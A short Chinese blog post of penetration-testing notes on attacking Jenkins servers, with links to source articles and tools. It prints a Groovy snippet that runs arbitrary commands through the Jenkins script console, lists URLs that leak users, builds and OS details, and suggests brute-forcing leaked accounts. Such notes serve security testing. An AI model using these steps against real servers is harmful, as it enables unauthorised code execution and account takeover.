今天mickey牛发来一篇关于hacking Jenkins的文章,受益匪浅,虽然不是很高深的东西,看完几篇相关文章之后记录下要点,为以后做安全测试留下笔记。       文章链接:           http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins. html           http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html           https://www.pentestgeek.com/2014/06/13/hacking-jenkins-servers-with-no-password/       工具链接:           https://wiki.jenkins-ci.org/display/JENKINS/Terminal+Plugin           https://github.com/samratashok/nishang           http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_script_console           https://wiki.skullsecurity.org/Passwords       文章要点:           看了几篇文章说道了一下几个东西:           1.通过自带的groovy script的解析器可以执行命令     1 2 3 4 5 def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"             2.使用强大的powershell脚本,nishang是一个powershell脚本集           3.当我们没有办法进入console script界面执行脚本的时候可以采用以下方法                   a.Jenkins的一下目录泄漏了一写开发用户信息                        List of users:                        http://[jenkinsurl]/asynchPeople/                        List of all builds:                         http://[jenkinsurl]/view/All/builds                         (Seems to be fixed in the latest version 1.575)                            List publilcy available content:                           http://[jenkinsurl]/userContent/                           Type of the Operating System:                            http://[jenkinsurl]/computer/                       b.通过泄漏的用户名爆破得到一些有build job权限的用户,然后执行相关命令   ​  
    上一篇: YY网站的一个xss跨站漏洞 - 网站安全 - 自学php

    下一篇: 利用OAuth劫持用户身份 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《关于Jenkins安全测试的一些技巧 – 网站安全 – 自学
   

还没有人抢沙发呢~